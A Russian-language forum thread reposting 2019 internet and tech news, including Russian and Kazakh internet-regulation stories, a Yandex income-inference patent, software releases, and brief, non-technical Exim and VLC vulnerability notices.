Добро пожаловать на форум STSAT!Для просмотра всего форума,Вам нужно войти или зарегистрироваться.Внимание для новичков!Чтобы скачать файл нужно написать 2 сообщения на форуме согласно темы.

Новости интернета

Новости интернета

Сообщение ANZOR » 12 авг 2016, 23:40


Новости интернета

«Бороться и искать, найти и не сдаваться!»
Аватара пользователя

ANZOR
Основатель ресурса
Основатель ресурса
 
Сообщения: 7555
Зарегистрирован: 06 авг 2016, 18:11
Points: 83747815.00
Bank: 0 Points
Откуда: Украина,Николаевская обл.
Медали: 2
Администратор (1) Основатель форума (1)
Cпасибо сказано: 12839
Спасибо получено: 8372 раз в 4510 сообщениях

Пол: Мужской
Ваш Знак зодиака: Весы
Ваша страна: Украина
Баллы репутации: 4878

За это сообщение пользователю ANZOR "Спасибо" сказали
mr.distryanov

Re: Новости интернета

Сообщение студент » 13 июл 2019, 13:59

В России могут ограничить ввоз терминалов спутниковой связи

Госдума в первом чтении приняла законопроект №586665-7 "О внесении изменений в статью 71 Федерального закона "О связи" ", сообщает "Роскомсвобода".

Лицензию на оказание услуг подвижной спутниковой связи может получить только российское юридическое лицо или индивидуальный предприниматель, поэтому документ, по мнению авторов, будет "способствовать предотвращению угроз национальной безопасности, обусловленных неконтролируемым ввозом абонентских терминалов и использованием зарубежных спутниковых систем связи и доступа в сеть "Интернет" ".

Законопроект вносит в статью 71 Федерального закона от 7 июля 2003 г. № 126-ФЗ "О связи" поправку, согласно которой соответствующее оборудование должно будет ввозиться только операторами связи, имеющими лицензию на предоставление услуг подвижной спутниковой радиосвязи и осуществляющими в установленном порядке эксплуатацию сетей связи, в которых ввозимые радиоэлектронные средства будут применяться.

Совет Госдумы постановил принять законопроект в первом чтении, а также предоставить поправки к нему в тридцатидневный срок. Доработка проекта с учетом поступивших поправок поручена Комитету Госдумы по инфополитике. Затем законопроект внесут на рассмотрение во втором чтении.

Член Совета Федерации Людмила Бокова, которая является одним из авторов проекта, отметила, что закон направлен на безопасность. Также она сказала, законопроект в совокупности с "90-ым федеральным законом", который определяет описание регулирования трафика, обяжет поставщиков оборудования соблюдать требования российского законодательства — они будут заключать договоры или легализовать свою деятельность другим образом, согласно российским законам.

Законопроект был принят абсолютным большинством голосов.

Напомним, что документ был внесен на рассмотрение в Госдуму в июне этого года. В пояснительной записке к проекту отмечалось, что "Принятие законопроекта не создаст существенных ограничений для операторов спутниковой связи, работающих в соответствии с действующим законодательством, а также не повлечёт за собой дополнительных расходов федерального бюджета"в Кодекс об административных правонарушениях, предусматривающие введение штрафов до 1 миллиона рублей за нарушение правил использования на территории РФ спутниковых сетей связи, находящихся под юрисдикцией иностранных государств.

В конце января 2019 года ГКРЧ ограничила ввоз в Россию терминалов мобильной спутниковой связи. Об этом свидетельствует протокол заседания комиссии от 30 ноября прошлого года, опубликованный на сайте Минкомсвязи.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 14 июл 2019, 22:04

Умер изобретатель компьютерных паролей

Фернандо «Корби» Корбато (Fernando Corbato) было 93 года


Компьютерная безопасность в конце этой недели потеряла одного из основателей. Фернандо «Корби» Корбато (Fernando Corbato), которому приписывают изобретение компьютерного пароля, умер в возрасте 93 лет. Исследователь, работавший в Массачусетском технологическом институте, разработал концепцию защищенных паролем учетных записей пользователей при создании в начале 1960-x годов своей операционной системы разделения времени Compatible Time-Sharing System (CTSS), которая обеспечивала многопользовательскую работу на одном компьютере. Будучи базовым элементом подобных систем, механизм парольного доступа заложил основы цифровой безопасности на многие годы.

Отметим, что пароли были не единственным новшеством, которое ввел Корбато. Модель разделения времени, реализованная в CTSS, сократила время ожидания ответа компьютера с часов до секунд, сделав технологию гораздо более пригодной для практического применения. За ее разработку Корбато в 1990 году получил премию Тьюринга. Она проложила путь для будущих операционных систем, таких как Linux, с более тонкими элементами управления конфиденциальностью, иерархической файловой системой и другими функциями, которые сегодня воспринимаются как должное.

Кроме того, изобретатель паролей известен благодаря «закону Корбато», который гласит, что «количество строк кода, которые может написать программист за определенное время, не зависит от используемого языка программирования».
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 15 июл 2019, 20:07

Представлен CoreCtrl 1.0, для привязки настроек оборудования к приложениям
15.07.2019 08:52


Опубликован первый выпуск приложения CoreCtrl, позволяющего определять профили изменения настроек оборудования, меняющие параметры работы GPU и CPU в зависимости от выполняемого приложения (например, для игр и программ 3D-моделирования можно привязать профиль максимальной производительности, а для браузера и офисных приложений включить режим экономии энергии и снизить частоту для уменьшения шума кулера). Код проекта написан на языке С++ (интерфейс на Qt и QML) и поставляется под лицензией GPLv3.

Профили привязываются к исполняемым файлам (в том числе к Windows-программам, запускаемым через Wine). Программа отслеживает активность в системе и автоматически активирует или отключает профили при запуске или завершении работы связанного с ними приложения. Система также позволяет отслеживать изменение температуры, состояние системных датчиков и различны метрики (нагрузка на CPU, потребление памяти) во время выполнения приложений.

В настоящее время проектом поддерживается управление новыми и старыми GPU AMD, включая изменение параметров вращения кулера, опрос датчиков, манипуляции частотой и напряжением, активацию режимов энергопотребления и управления производительностью. Также имеется базовая поддержка изменения частоты CPU, настройки CPU governor, задания лимитов на максимальную частоту и отображения параметров работы процессора. В дальнейшем планируется добавить поддержку других GPU и расширить средства управления CPU.

Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 16 июл 2019, 18:00

Узбекистан поднялся на 8 позиций в мировом рейтинге скорости интернета

Узбекистан поднялся на 8 позиций в мировом рейтинге скорости мобильного и проводного интернета, сообщает Spot. Таким образом, он оказался на 116-м месте.

Такой рейтинг (Speedtest Global Index) 16 июля опубликовал сайт Speedtest.net ирландской компании Ookla по итогам июня 2019 года.

Средняя скорость выросла до 17 Мбит/с. Для сравнения, по итогам июня 2018 года средняя скорость была 8,9 Мбит/с. Таким образом, за год скорость выросла почти на 10 Мбит/с.

Безлимитные тарифы на интернет домой в Узбекистане предоставляют 17 операторов и провайдеров. Цены — от 60 тысяч до 550 тысяч сумов в месяц (от $6,99 до $64) в зависимости от скорости (минимальная 1 Мбит/с). Год назад безлимитные тарифы, во-первых, были не у всех, а, во-вторых, цены на них всегда были шестизначными.

Планируется, что к 2020 году скорость интернета в стране выйдет на уровень СНГ. Об этом сообщил провайдер "Узбектелеком". Пресс-секретарь компании Александр Сучков отметил, что Также он отметил, что до уровня стран СНГ скорость интернета в Узбекистане дойдет, когда будут построены оптические сети, и напомнил, что с начала 2019 года компания проложила более 5 тысяч км волоконно-оптических линий связи для предоставления телекоммуникационных услуг с использованием технологии GPON.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 21 июл 2019, 22:46

Считают ваши денежки: "Яндекс" нашел способ следить за доходами юзеров


Компания "Яндекс" разработала способ определения доходов пользователей своих сервисов. Корпорация уже зарегистрировала соответствующий патент, с которым ознакомились "Известия".

Из документа следует, что заработок будут определять по профессии. Выяснить место работы пользователя не сложно, если подслушать окружающие его звуки и "подсмотреть", какими приложениями он пользуется. Технологию можно использовать как минимум для персонализации рекламы или запуска нового сервиса, говорят эксперты. Однако они не исключают, что собранной информацией могут заинтересоваться и спецслужбы.

Все под контролем

Патент, зарегистрированный "Яндексом", получил название "Система и способ определения дохода пользователя мобильного устройства". Заявка от корпорации поступила еще в апреле 2017-го, но зарегистрировано Роспатентом изобретение было только в этом году.

Как следует из описания, доход предполагается определять по профессии пользователя. Это можно сделать, проанализировав данные GPS, окружающие звуки и "подсмотрев", какие сторонние приложения для работы есть на смартфоне (веб-сервисы по управлению строительством, сервисы доставки, веб-сервисы поливки и так далее). К примеру, строителя выдаст постоянный шум — в патенте приведены в качестве примера работы по сносу, плотницкие и сварочные работы. Также в документе фигурируют профессии водителя такси, курьера, официанта и художника.

Описанная технология не всегда может точно определить профессию пользователя, полагает проректор Академии труда и социальных отношений Александр Сафонов. К примеру, данные с сенсоров девайсов санитарки и главврача будут примерно одинаковыми. Потом, даже точное определение профессии не дает представления о доходе, считает Александр Сафонов.

— Допустим, "вилка" зарплаты экономиста в Москве — от 40 тыс. до 1 млн рублей, и сведения о квалификации конкретного специалиста трудно получить по данным смартфона. Опять же, даже точное знание ежемесячного дохода ничего не говорит о возможностях: человек может как тратить только на себя, так и содержать жену, детей, родителей, — рассказал эксперт.

Данные о пользователях компания может собирать с помощью таких приложений, как "Яндекс.Такси", Google.Maps, "Яндекс.Карты", "Яндекс.Почта", Uber, "Яндекс.Поиск", "Яндекс.Деньги", Gmail и других, указано в патенте. В качестве примеров клиентских устройств приводятся настольные компьютеры, ноутбуки, нетбуки, смартфоны, планшеты, а также сетевое оборудование — маршрутизаторы, коммутаторы и шлюзы.

При этом в "Политике конфиденциальности" корпорации указано, что она может не только самостоятельно использовать персональную информацию, но и передавать ее рекламодателям и другим партнерам. Также, если к тому обязывает закон, данные могут запросить любые национальные или международные регулирующие органы, правоохранители, центральные или местные исполнительные органы власти, а также суды или другие государственные службы

В пресс-службе "Яндекса" отказались отвечать на вопросы "Известий" о том, используется ли запатентованная система на практике и как можно применить полученные с ее помощью данные.

— Но хочу напомнить, что не все технологии, которые патентуются, потом используются. Это нормальная практика для разных компаний, — отметил представитель "Яндекса".

Законодательство о персональных данных не ограничивает возможности использования программных средств, пояснили "Известиям" в Роскомнадзоре в ответ на просьбу проанализировать описанную в патенте методику на соответствие действующим нормам права. Там отметили, что сбор и дальнейшая обработка персонифицированной информации может осуществляться только на основании закрытого перечня правовых оснований, предусмотренных ст. 6 закона "О персональных данных" (например, в исследовательских целях или для работы властей), с соблюдением требований конфиденциальности и безопасности, а также с обеспечением локализации баз данных на территории России.

Маркетинг или шпионаж

Патент был оформлен на конкретную бизнес-идею, которую придумал работавший в корпорации на момент подачи заявки Леонид Шныр — он же указан в числе авторов изобретения.

— Эта идея может никогда не быть реализованной, но она имеет большой потенциал, поэтому решили запатентовать. Вопрос не в том, что описанный подход лучше используемых сейчас в работе с данными. Важно, что он открывает новые возможности. Уверен, если "Яндекс" будет использовать этот патент (или уже использует), всё будет реализовано в рамках законодательства, — сказал "Известиям" Леонид Шныр.

На сбор материалов через микрофон, маршрутов, информации о приложениях требуется получать согласие пользователя, пояснил замдиректора координационного центра национального домена сети интернет Сергей Копылов. Оно может быть выражено галочкой, которую приложения предлагают поставить перед началом работы как знак принятия правил использования сервиса, пояснил он. Больше 90% людей не читают документы, считая это слишком утомительным занятием, заметил Сергей Копылов. Он предположил, что, даже не используя систему, "Яндекс" может на ней заработать, предъявив судебные претензии к другим корпорациям, если они захотят собирать те же данные

Защититься от прослушивания и других способов слежки за пользователями позволяют сами гаджеты, отметил глава департамента разработок Bitware Дмитрий Мурзинов. К примеру, техника Apple позволяет запрещать приложениям доступ к геолокации, микрофону, камере и так далее или разрешать его лишь при использовании сервисов. Аналогичные механизмы есть и у смартфонов на Android. Однако, эксперт выразил озабоченность тенденцией распространения аппаратуры собственной разработки "Яндекса": "Яндекс.Смартфона", "Яндекс.Станции" и "Яндекс.Авто", на работу сенсоров которых не накладываются ограничения третьих сторон. Так например, семь микрофонов колонки "Яндекс.Станция", как и автомобиль "Яндекс.Драйва" слушают пользователей постоянно.

За поведением владельцев гаджетов следят многие корпорации, уверен директор Ассоциации профессиональных пользователей соцсетей и мессенджеров Владимир Зыков. Например, многие замечали, что, если поговорить рядом со смартфоном о каком-либо товаре, в Facebook начинает появляться его реклама. Американские конгрессмены даже спрашивали основателя соцсети Марка Цукерберга, подслушивает ли приложение пользователей, однако бизнесмен опровергал эту информацию. В сборе данных через микрофон или наличии такой возможности ранее уличали Google и Apple, напомнил Владимир Зыков.

— Как минимум информацию о человеке можно использовать для рекламы товаров. Однако нельзя исключать, что "подсматривание" за другими приложениями можно применить в промышленном шпионаже. Потом, вероятно, данные о пользователях могут быть предоставлены по запросу спецслужб, — предположил эксперт.

1 июля 2018 года в России вступил в силу свод антитеррористических законов, известный как "пакет Яровой". Правила, в частности, предусматривают хранение компаниями, входящими в реестр ОРИ, трафика в течение шести месяцев. Данные должны предоставляться спецслужбам, если от них поступит такой запрос.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 21 июл 2019, 23:03

Выпуск модуля LKRG 0.7 для защиты от эксплуатации уязвимостей в ядре Linux
21.07.2019 19:43


Проект Openwall опубликовал выпуск модуля ядра LKRG 0.7 (Linux Kernel Runtime Guard), обеспечивающего выявление несанкционированного внесения изменений в работающее ядро (проверка целостности) или попыток изменения полномочий пользовательских процессов (определение применения эксплоитов). Модуль подходит как для организации защиты от уже известных эксплоитов для ядра Linux (например, в ситуациях когда в системе проблематично обновить ядро), так и для противостояния эксплоитам для ещё неизвестных уязвимостей. Об особенностях LKRG можно прочитать в первом анонсе проекта.

Среди изменений в новой версии:

Проведён рефакторинг кода для обеспечения поддержки различных архитектур CPU. Добавлена начальная поддержка архитектуры ARM64;
Обеспечена совместимость с ядрами Linux 5.1 и 5.2, а также ядрами, собранными без включения при сборке ядра опций CONFIG_DYNAMIC_DEBUG, CONFIG_ACPI и CONFIG_STACKTRACE, и с ядрами собранными с опцией CONFIG_STATIC_USERMODEHELPER. Добавлена экспериментальная поддержка ядер от проекта grsecurity;
Значительно изменена логика инициализации;
В подсистеме проверки целостности повторно включено самохэширование (self-hashing) и устранено состояние гонки в движке меток перехода (*_JUMP_LABEL), приводящее к взаимной блокировке при инициализации одновременно с событиями загрузки или выгрузки других модулей;
В коде определения применения эксплоитов добавлены новые sysctl lkrg.smep_panic (по умолчанию включен) и lkrg.umh_lock (по умолчанию выключен), добавлены дополнительные проверки бита SMEP/WP, изменена логика отслеживания новых задач в системе, переработана внутренняя логика синхронизации с ресурсами задач, добавлена поддержка OverlayFS, помещён в белый список Ubuntu Apport.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 22 июл 2019, 14:24

Граждане Казахстана скептически отнеслись к нацсертификату безопасности

Казахстанцы настороженно отнеслись к рекомендации установить национальный сертификат безопасности на все устройства с доступом в интернет, сообщает "Роскомсвобода". Значительную роль в этом сыграла информация о будущих проблемах с доступом в интернет в случае отказа пользователей от этого сертификата.

При этом уточняется, что некоторые пользователи уже сообщили о недоступности социальных сетей, почтового сервиса Gmail и видеосервиса YouTube.

Telegram-канал StupidMadWorld сообщил: "В столице Казахстана Астане, у всех операторов, кроме Билайна (все операторы, кроме Билайна, государственные) не открываются популярные соцсети если вы не установили сертификат. Мм, свобода".

В Министерстве цифрового развития Казахстана сообщили о проведении технических работ, "направленных на усиление защиты граждан, государственных органов и частных компаний от хакерских атак, интернет-мошенников и иных видов киберугроз". Вице-министр цифрового развития, инноваций и аэрокосмической промышленности Республики Казахстан Аблайхан Оспанов сообщил, что это пилотный проект. Следовательно, позднее его могут распространить на всю страну.

Юрист Елжан Кабышев уточняет: "В законе "О связи" не указана прямая обязанность абонентов на их принудительную установку. Установка и использование абонентом сертификатов безопасности облегчает доступ для блокировки или ограничения доступа к тому или иному ресурсу. Исходящий трафик можно проследить и блокировать доступ к нежелательному контенту будет весьма удобно. Но пока для установки сертификата нужно согласие абонента".

"Сертификат безопасности не является активным средством для обеспечения утечки персональной и иной информации или защиты, так как не способен это осуществить. Он - инструмент блокировки", - подчеркивает адвокат Кожахмет Руслан.

Гендиректор компании "Дата-сфера" Эльдар Кнар (Eldar Knar) в Facebook выразил мнение, что в инициативе с использованием национального сертификата безопасности есть коррупционная составляющая, а также возможность иностранного шпионажа под прикрытием окологосударственных частных компаний. По данным Кнара, "интернет-ресурс qca.kz и распространяемый данным интернет-ресурсом сертификат являются частной собственностью", при этом конечным бенефициаром данного ресурса и сертификата является частное лицо - "некий казахстанский гражданин Аскар Дюсекеев". Кнар уточняет, что Дюсекеев получил от российской компании "Лаборатория Касперского" грант в размере 10 000 долларов и свой российский сертификат.

На основании этих сведений Эльдар Кнар высказывает предположение, что "полученная со стороны иностранного государства сумма была использована Аскаром Дюсекеевым для создания ПО в виде сертификата. Разумеется, не без помощи специалистов Касперского, поскольку в его компетенции сильно сомневаюсь". Затем эксперт добавляет: "Более того, есть основание полагать, что данный сертификат и создан в Лаборатории Касперского".

"Фактически в данном случае речь может идти о незаконной деятельности и одновременном нарушении некоторых норм Конституции и Законодательства Республики Казахстан", - подчеркивает Кнар.

В связи с данными предположениями Эльдар Кнар обратился Генпрокуратоуру Казахстана с просьбой провести проверку.

Исполнительный директор организации "Общество защиты интернета" Михаил Климарев сообщил в своем Telegram-канале, что облачный сервис безопасности Cisco Umbrella заблакировала ресурс qca.kz, с которого предлагается скачивать сертификат, как представляющий угрозу, по данным аналитиков сервиса.

Активисты Mozilla видят в навязывании установки сертификата атаку на зашифрованный трафик. Linux-администратор Иван Гуменюк заявил: "Помимо самого вопиющего факта государственной цензуры и возможности просмотра личной переписки, будут большие проблемы с устройствами и софтом, которые не позволяют добавить левый сертификат. Они превратятся в тыкву. Но это никого не волнует. Не менее важным фактором является потенциальная утечка личных данных, паролей к сервисам, которые наверняка будут централизованно собираться. Иначе смысла нет этот цирк с конями устраивать изначально". Гуменюк отметил, что это серьезная проблема, которая почти не решается техническими средствами.

Напомним, о том, что операторы связи Казахстана начали уведомлять клиентов о необходимости установить специальный сертификат безопасности Qaznet Trust Network на все абонентские устройства с доступом в интернет, сообщалось в прошлую пятницу. Уточнялось, что вместе с информацией о необходимости установить сертификат распространяются также сведения о том, что его отсутствие может привести к проблемам с доступом к отдельным интернет-ресурсам. При этом Аблайхан Оспанов заявил, что жители республики не обязаны устанавливать сертификаты, им всего лишь предоставляется подобная возможность, положенная по закону.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 24 июл 2019, 11:44

Выпуск nginx 1.17.2

Доступен выпуск основной ветки nginx 1.17.2, в рамках которой продолжается развитие новых возможностей (в параллельно поддерживаемой стабильной ветке 1.16 вносятся только изменения, связанные с устранением серьёзных ошибок и уязвимостей.

Основные изменения:

Добавлена поддержка переключения именованных блоков "location" при помощи метода $r->internal_redirect(), предоставляемого встроенным интерпретатором Perl. Данный метод теперь подразумевает обработку URI с экранированными символами;
Требование к минимально поддерживаемой версии zlib поднято до 1.2.0.4;
Решены проблемы с обработкой ошибок во встроенном интерпретаторе Perl;
Устранены проблемы в модулях ngx_http_xslt_filter_module и ngx_http_ssi_filter_module;
Устранён крах в процессе запуска или переконфигураци в случае указания в настройках размера блока хэша более 64 Кб;
Решена проблема с большой нагрузкой на CPU при небуферизированном проксировании или проксировании соединений WebSocket при использовании методов select, poll или /dev/poll.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 24 июл 2019, 11:45

Предупреждение о критической уязвимости в Exim

Разработчики почтового сервера Exim предупредили администраторов о намерении выпустить 25 июля обновление 4.92.1, в котором будет устранена критическая уязвимость (CVE-2019-13917), позволяющая удалённо добиться выполнения своего кода с правами root при наличии в конфигурации определённых специфичных настроек.

Детали о проблеме пока не разглашаются, всем администраторам почтовых серверов рекомендовано подготовиться к установке экстренного обновления 25 июля. В этот день скоординированно будут выпущены обновления пакетов с Exim в основных дистрибутивах. При этом риск эксплуатации уязвимости отмечен как низкий, так как уязвимость не проявляется в конфигурации по умолчанию, как в базовой поставке Exim, так и в пакете для Debian.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 24 июл 2019, 11:48

Уязвимость в медиапроигрывателе VLC
24.07.2019 10:57


В медиапроигрывателе VLC выявлена уязвимость (CVE-2019-13615), которая потенциально может привести к выполнению кода злоумышленника при воспроизведении специально оформленного видео в формате MKV (прототип эксплоита). Проблема вызвана обращением к области памяти вне выделенного буфера в коде распаковки медиаконтейнера MKV и проявляется в актуальном выпуске 3.0.7.1.

Исправление пока недоступно, как и обновления пакетов (Debian, Ubuntu, RHEL, Fedora, SUSE, FreeBSD). Уязвимости присвоен критический уровень опасности (9.8 из 10 CVSS). При этом разработчики VLC полагают, что проблема ограничивается лишь утечкой памяти и не может быть использована для организации выполнения кода или инициирования краха.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 24 июл 2019, 18:00

В ГД прокомментировали законопроект об идентификации пользователей e-mail

Председатель комитета Государственной думы по информационной политике, информационным технологиям и связи Леонид Левин отметил, что законопроект об обязательной идентификации пользователей электронной почты можно истолковать как произвольное внесудебное ограничение прав граждан на тайну личной переписки, которое гарантирует Конституция России, сообщает "Интерфакс".

Речь о законопроекте, который 23 июля 2019 года внесла в Госдуму группа сенаторов во главе с Андреем Клишасом, соавторами законопроекта являются сенаторы Александр Башкин, Людмила Бокова и Александр Карлин. Документ, с которым можно ознакомиться по ссылке, предполагает норму об обязательной идентификации пользователей электронной почты по номеру мобильного телефона. Законопроект предусматривает запрет на передачу сообщений от лиц, не прошедших идентификацию, а также обязательство для почтовых сервисов блокировать передачу сообщений с запрещенным или незаконным контентом. По мнению авторов поправок, это поможет бороться с рассылкой ложных сообщений об угрозе терактов.

"Обозначенный в законопроекте механизм ограничения пересылки запрещенной информации не оговаривает необходимость законности действий со стороны уполномоченного органа и может быть истолкован как произвольное внесудебное ограничение установленного Конституций права граждан на тайну личной переписки", - сказал Леонид Левин.

Также Левин заметил, что проект может ущемлять права жителей труднодоступных районов, где люди могут не иметь собственного мобильного телефона и использовать сервис электронной почты посредством точек коллективного доступа.

Кроме того, Левин обратил внимание, что законопроект может поставить в неравное положение российские и иностранные компании, которые владеют сервисами электронной почты.

"Интерфакс" подчеркивает, что на это также обратили внимание и представители отрасли. В Mail.ru Group инициативу охарактеризовали как избыточную и неуместную, и выразили мнение, что такая норма заставит российские компании нести дополнительные издержки, а иностранные компании смогут его игнорировать. Также в компании отметили, что закон создаст существенные неудобства для пользователей.

В "МегаФоне" также обратили внимания на тот факт, что выполнять требования обязаны будут только российские сервисы, что будет их дискриминировать, по сравнению с иностранными. При этом в компании отметили, что технология идентификации пользователей электронной почты по номеру телефона уже существует (Mobile ID), и операторы готовы ею пользоваться.

Интернет-омбудсмен Дмитрий Мариничев также сообщил "Интерфаксу", что данный законопроект нарушает тайну переписки, а также Конституцию РФ, и, кроме того, технически неисполним (в части блокировки сообщений с запрещенным и незаконным контентом).

При этом, также по данным "Интерфакса", сенатор Андрей Клишас, являющийся одним из авторов документа, заявил, что законопроект не нарушает конституционного права на тайну частной переписки.

Аргументируя свою позицию, Клишас напомнил, что аналогичное требование уже ввели для пользователей мессенджеров и покупателей SIM-карт, и при принятии этих норм вопроса о нарушении тайны переписки в момент идентификации пользователей не возникало.

"Новая газета" приводит комментарии еще нескольких экспертов отрасли. Директор некоммерческой организации "Общество защиты интернета" Михаил Климарев прокомментировал инициативу следующим образом: "В идеальном мире сенатора Клишаса все, видимо, должно работать так: спецслужбы узнают, к какому номеру телефона привязана электронная почта, по номеру телефона узнают данные пользователя (через паспорт с пропиской), идут к нему домой и задерживают", при этом эксперт отметил, что в реальности это не будет возможно, так как письма с угрозами или спам могут быть отправлены из любой страны мира, а самого электронного ящика может не существовать в принципе.

Владелец прокси-сервиса TgVPN Владислав Здольников пояснил: "Российские сервисы и так собирают номера телефонов для внутренних нужд. Теперь власти хотят сделать эту идентификацию обязательной, что приведет к возможности спецслужб спокойно получать доступ к переписке пользователей". Кроме того, эксперт отмечает, что введение такой нормы принесет выгоду только иностранным почтовым сервисам, и в частности, Google, поскольку они смогут эту норму игнорировать.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 25 июл 2019, 15:08

Представлен первый предварительный выпуск Fedora CoreOS

Разработчики проекта Fedora объявили о начале тестирования первой предварительной версии новой редакции дистрибутива Fedora CoreOS, которая пришла на смену продуктам Fedora Atomic Host и CoreOS Container Linux в качестве единого решения для запуска окружений на базе изолированных контейнеров.

Из CoreOS Container Linux, который перешёл в руки Red Hat после покупки компании CoreOS, в Fedora CoreOS перенесены инструментарий развёртывания (система конфигурирования на стадии начальной загрузки Ignition), механизм атомарных обновлений и общая философия продукта. Из Atomic Host перенесены технология работы с пакетами, поддержка спецификаций OCI (Open Container Initiative) и дополнительные механизмы изоляции контейнеров на базе SELinux. Начинка Fedora CoreOS формируется на основе репозиториев Fedora с применением rpm-ostree. В качестве поддерживаемых в Fedora CoreOS runtime для контейнеров заявлены Moby (Docker) и podman. Для оркестровки контейнеров поверх Fedora CoreOS планируется обеспечить поддержку Kubernetes.

Проект нацелен на предоставление минимального окружения, атомарно обновляемого в автоматическом режиме без участия администратора и унифицированного для массового развёртывания серверных систем, предназначенных исключительно для запуска контейнеров. Fedora CoreOS содержит только минимальный набор компонентов, достаточный для выполнения изолированных контейнеров - ядро Linux, системный менеджер systemd и набор служебных сервисов для подключения по SSH, управления конфигурацией и установки обновлений.

Системный раздел монтируется в режиме только для чтения и не изменяется в процессе работы. Конфигурация передаётся на этапе загрузки при помощи инструментария Ignition (альтернатива Cloud-Init). После того как система запущена, изменение конфигурации и начинки каталога /etc невозможно, допустимо лишь изменить профиль настроек и использовать его для замены окружения. В общем виде работа с системой напоминает работу с образами контейнеров, которые не обновляются по месту, а перестраиваются с нуля и запускаются заново.

Системный образ неделим и формируется с использованием технологии OSTree (отдельные пакеты установить в таком окружении нельзя, можно лишь пересобрать весь образ системы, расширив его новыми пакетами при помощи инструментария rpm-ostree). Система обновлений основана на использовании двух системных разделов, один из которых является активным, а второй используется для копирования обновления, после установки обновления разделы меняются ролями.

Предлагаются три независимых ветки Fedora CoreOS: testing со снапшотами на основе актуального релиза Fedora с обновлениями; stable - стабилизированная ветка, формируемая после двух недель тестирования ветки testing; next - снапшот находящегося в разработке будущего выпуска. Для всех трёх веток формируются обновления с устранением уязвимостей и серьёзных ошибок. На текущем этапе разработки в рамках предварительного выпуска пока формируется только ветка testing. Первый стабильный выпуск планируется выпустить через 6 месяцев. Поддержка дистрибутива CoreOS Container Linux будет прекращена через 6 месяцев после стабилизации Fedora CoreOS, а прекращение поддержки Fedora Atomic Host ожидается в конце ноября.

После стабилизации проекта по умолчанию будет включена отправка телеметрии (в предварительной сборке телеметрия пока неактивна) с использованием сервиса fedora-coreos-pinger, который периодически накапливает и отправляет на серверы проекта Fedora не приводящую к идентификации информацию о системе, такую как номер версии ОС, облачная платформа тип установки. Среди передаваемых данных отсутствуют сведения, которые могут привести к идентификации. При разборе статистики используются лишь агрегированные сведения, позволяющие в общем виде судить о характере использования Fedora CoreOS. При желании пользователь может отключить отправку телеметрии или расширить передаваемые по умолчанию сведения.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 25 июл 2019, 15:14

Выпуск среды разработки Tizen Studio 3.3
25.07.2019 05:23


